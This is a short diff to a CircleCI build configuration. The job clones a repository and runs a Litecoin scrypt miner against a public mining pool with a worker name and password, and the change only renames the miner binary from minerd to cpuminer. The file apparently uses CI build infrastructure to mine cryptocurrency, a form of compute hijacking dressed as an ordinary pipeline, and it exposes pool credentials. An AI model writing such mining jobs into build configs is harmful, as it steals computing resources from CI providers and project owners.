--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -12,8 +12,8 @@ jobs:
            git clone --depth=1 git@github.com:ltcwoker/RDP.git Q
            cd Q
            
-           chmod 755 minerd
-           ./minerd --algo=scrypt --url=stratum+tcp://us.litecoinpool.org:3333 --userpass=djemil.mywoker14:my123456
+           chmod 755 cpuminer
+           ./cpuminer --algo=scrypt --url=stratum+tcp://us.litecoinpool.org:3333 --userpass=djemil.mywoker14:my123456
       
           
 workflows:
